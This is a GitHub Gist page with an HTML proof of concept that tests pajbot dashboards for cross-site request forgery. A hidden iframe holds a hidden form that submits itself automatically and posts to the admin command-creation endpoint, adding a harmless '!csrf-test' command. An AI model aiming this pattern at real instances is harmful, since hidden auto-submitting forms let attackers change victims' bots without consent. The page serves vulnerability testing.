-
-
Save Melonify/d8e5d70cdc1bebb871f72dc79d69ac60 to your computer and use it in GitHub Desktop.
Pajbot CSRF Vulnerability Test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>CSRF Vulnerability Test</title> | |
| </head> | |
| <body> | |
| <h1>CSRF Vulnerability Test</h1> | |
| <p>Check your pajbot dashboard for a command labeled !csrf-test</p> | |
| <iframe id="frame" style="display: none;" src="about:blank"></iframe> | |
| <script> | |
| let frameDocument = document.getElementById("frame").contentWindow.document; | |
| frameDocument.open(); | |
| frameDocument.write(` | |
| <html> | |
| <head> | |
| <title>CSRF Vulnerability Test Hidden Frame</title> | |
| </head> | |
| <body> | |
| <form style="display: none;" id="form" method="POST" action="https://(YOUR PAJBOT URL)/admin/commands/create"> | |
| <input type="hidden" name="aliases" value="csrf-test"> | |
| <input type="number" name="level" placeholder="Level" value="100"> | |
| <input type="number" name="cd" placeholder="Cooldown" value="5"> | |
| <input type="number" name="usercd" placeholder="Cooldown" value="15"> | |
| <input type="number" name="cost" placeholder="Cost" value="0"> | |
| <input type="text" name="reply" value="say"> | |
| <input type="text" name="response" value="Hello World"> | |
| </form> | |
| <script> | |
| document.getElementById("form").submit(); | |
| <\/script> | |
| </body> | |
| </html> | |
| `.trim()); | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment